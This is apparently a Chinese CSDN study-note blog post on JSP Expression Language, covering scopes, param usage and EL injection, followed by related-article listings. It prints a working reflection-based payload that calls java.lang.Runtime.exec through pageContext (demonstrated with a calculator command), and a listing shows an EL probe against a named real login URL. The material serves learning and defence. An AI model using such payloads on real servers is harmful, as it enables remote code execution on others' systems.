的表达式_EL表达式注入

最新推荐文章于 2024-04-09 14:46:26 发布
最新推荐文章于 2024-04-09 14:46:26 发布
阅读量383 收藏
点赞数
文章标签: 的表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28804631/article/details/112670832
版权

学习了下 做个记录

什么是el表达式

  • Expression Language表达式语言

  • 是一种在JSP页面获取数据的简单方式(只能获取数据,不能设置数据)

  • 在JSP2.0开始引入概念

el表达式就是用来获取数据的,可从以下几个域获取属性

pagescope requestscope sessionscope applicationscope pagecontext


以上对象范围从小到大,其中pagecontext可获取page request session application,可谓域中的?

el表达式访问属性例子

e05321f3e7dd8d9de8d7eb412550c0ed.png

8686c6a3793e46ce9f83c38ff644c799.png

el表达式param和paramvalues用法

param底层是调用request.getParameterparamvalues是调用request.getParameterValues${param["a"]}${param.a}
<%@ page contentType="text/html;charset=UTF-8" language="java" %><html><head>    <title>Titletitle>head><body>name=${param["test"]}body>html>

86ea1423632071d0bbab8d379f5969f5.png

el表达式注入

漏洞产生原因主要是表达式可由攻击者操作,导致攻击者可注入恶意代码

前面说了由于pagecontext域可操纵request session application,而这几个域里面均有setAttribute方法,可通过setAttribute方法创建一个值,值内容通过反射调用任意类,达到rce滴效果

例如通过反射java.lang.runtime.exec 达到命令执行的目的

name=${pageContext.session.setAttribute("test","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"open -a calculator"))}

3c42234a324e7613107281741a0a9146.png

搭脉大愣
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【Java代码审计】表达式注入
大河之犬的博客
04-02 864
表达式注入是一种安全漏洞,发生在应用程序中使用动态表达式的情况下。在表达式注入中,攻击者通过在输入数据中插入恶意代码来利用应用程序中的动态表达式执行漏洞,从而执行恶意操作。这种漏洞通常发生在使用解释性语言或动态执行代码的环境中。
RichFaces CVE-2018-14667
weixin_33694172的博客
11-21 891
RichFaces CVE-2018-14667 0x00 RichFaces 简述 RichFaces是一个基于LGPL协议开放源代码的JSF(JavaServer Faces)组件库,它能够使应用开发方便地集成AJAX。现在的RichFaces库是由Ajax4jsf和RichFaces两部分组成0x01 0x01 漏洞成因 Java RichFaces框架中包含一个RCE漏洞,恶意***者构...
Javaweb安全——表达式注入(EL+SpEL)
weixin_43610673的博客
07-22 2933
Java中表达式根据框架分为好多种,这里以JSP自带的表达式语言EL和使用较多的Spring框架所支持的SpEL为例。其基本语法为${变量表达式}。
EL表达式
顺其自然~专栏
09-22 308
以MVC模式设计程序,JSP只是视图,视图的任务就是显示响应,而不是在JSP中做任何关于程序控制和业务逻辑的事情。所以在JSP页面中应该尽可能少的、或者是完全不出现Java代码。 在使用JSP标准动作操作 JavaBean时,如果JavaBean的属性是 String类型或者基本类型,则能够实现类型的自动转换,如 JavaBean的属性从String类型可自动转换成int类型。如果 Javabean中的属性不是 String类型和基本类型,而是一个 Object类型,并且属性还有自己的属性,如何获得此 O
『Java安全』EL表达式注入
Ho1aAs‘s Blog
04-02 5031
文章目录前言EL表达式解析启用/禁用EL表达式注入绕过方式1. 反射2. js引擎rce参考引用完 前言 EL表达式全称Express Language EL表达式语法以${}包裹 其他使用方法见参考文章 EL表达式解析启用/禁用 默认为启用,jsp会解析EL表达式,除非配置<%@ page isELIgnored ="true|false" %>,或者是全局pom.xml设置 <jsp-config> <jsp-property-group>
Java表达式注入(JSP EL表达式注入
GalaxySpaceX的博客
08-16 1112
Java表达式注入(JSP EL表达式注入
EL 表达式注入攻击
m0_62207482的博客
03-04 147
例如,${ userinfo}代表获取变量userinfo的值。当EL表达式中的变量不给定范围时,则默认在page范围查找,然后依次在request、session、application范围查找。也可以用范围作为前缀表示属于哪个范围的变量,例如:${ pageScope. userinfo}表示访问page范围中的userinfo变量。事实上,可以将EL表达式理解为一种简化的JSP代码。简单地说,使用EL表达式语法:${EL表达式}JSP表达式:<%=变量或表达式>声明jsp的成员变量或成员方法。
js中el表达式的使用和非空判断方法
12-03
在JS中使用EL表达式,我们实际上是将EL表达式的值注入到JS代码中,这需要通过服务器端渲染完成。例如,`${jsonData}`将会被替换为服务器端`jsonData`变量的值。 **二、Spring MVC与JSON数据** Spring MVC允许我们...
javaScript使用EL表达式的几种方式
10-25
JavaScript中的EL(Expression Language)表达式,是一种在JavaServer Pages (JSP)中常见的用于访问和操作服务器端数据的语言。它允许开发者以简洁的方式获取...记得在使用EL表达式时注意安全问题,避免潜在的注入攻击。
表达式注入1
08-03
JSP的EL表达式允许直接访问Java对象,如`${expression}`,如果不加以限制,攻击者可能构造出执行命令表达式。 MVEL是一个强大的表达式语言,类似于OGNL和SPEL,也能执行Java代码。例如,`MVEL.eval(expression, ...
springMVCDemo.rar
03-30
在这个名为"springMVCDemo.rar"的压缩包中,我们重点关注的是"EL表达式注入"这一概念,这涉及到Spring MVC中的SpEL(Spring Expression Language)以及如何在应用中使用它。 EL,全称为Expression Language,是Java...
EL表达式所有jar包(包含两个)
06-20
10. **EL的安全性**:需要注意的是,EL表达式也可能带来安全风险,如代码注入,因此在设计和实现时应确保对输入进行适当的验证和清理。 综上所述,这个资源包对于理解并实施基于EL的会话统计或其他类似功能具有重要...
JSP使用、EL表达式
a23452的博客
12-28 1177
JSP 内容导航JSPjsp规范介绍JSP中书写java命令 执行标记<% %><%= %>输出标记JSP内置对象request 请求对象session 会话作用域对象9大内置对象JSP和servlet分工配合的案例,实现StudentListActionJSP文件调用步骤EL技术 ${域Scope.变量名}作用域对象别名引用类型对象的属性ELEL表达式简化 Javaweb — Servlet 的cookie和监听器、过滤器 117天 JSP的引入,EL表达式
9、表达式注入漏洞_通用的poc,2024年互联网大厂网络安全面经总结
最新发布
2401_84159839的博客
04-09 533
EL是为了让让JSP写起来更加简单,提供了在JSP中简化表达式的方法。获取数据执行运算获取Web开发常用队形调用Java方法。
java 代码执行el,专属于java的漏洞——EL表达式注入
weixin_39997443的博客
03-20 1140
前言“FSRC经验分享”系列文章,旨在分享焦点科技信息安全部工作过程中的经验总结,包括但不限于漏洞分析、运营技巧、sdl推行、等保合规、自研工具等等。欢迎各位安全从业者持续关注~0x01EL简介表达式语言(Expression Language 以下简称EL)是以JSTL(JavaServer Pages Standard Tag Library,JSP标准标签库)的一部分出现的,原本被叫做SPE...
浅析EL表达式注入漏洞
火柴人的博客
05-17 951
https://xz.aliyun.com/t/7692
应用安全系列之十六:Expression Language (EL) Injection
jimmyleeee的专栏
03-11 1370
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施。 关于什么是EL(Expression Language),不在这里详细叙述,可以参考https://docs.oracle.com/javaee/7/tutorial/jsf-el.htm和https://docs.oracle.com/javaee/6/tutorial/doc/bnahq.html。 EL确实给实现带来了很多方便,例如:在JSLT中,可以直接显示一个对象的一个属性:<c:out value=”...
Java EL表达式注入命令执行修复
YH的博客
04-16 2578
在可能造成EL表达式注入的页面中加入下列代码来忽略参数中的EL表达式: <%@ page isELIgnored="true"%>
java el 表达式_JAVA WEB EL表达式注入
weixin_36132766的博客
02-20 171
#1 漏洞地址code 区域https://auth.p4p.sogou.com/login?service=${1000-900}code 区域https://auth.p4p.sogou.com/login?service=${pageContext}action="/login?service=com.caucho.jsp.PageContextImpl@2aaf3a58" method="...
用java帮忙写一个存在el表达式注入的靶场
05-26
首先,需要了解EL表达式注入的概念。EL表达式是Java EE中用于访问JavaBean属性的一种语言,可以在JSP页面中使用。EL表达式注入是指攻击者通过构造恶意EL表达式,向服务器发送请求,从而获取或篡改数据。为了演示EL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值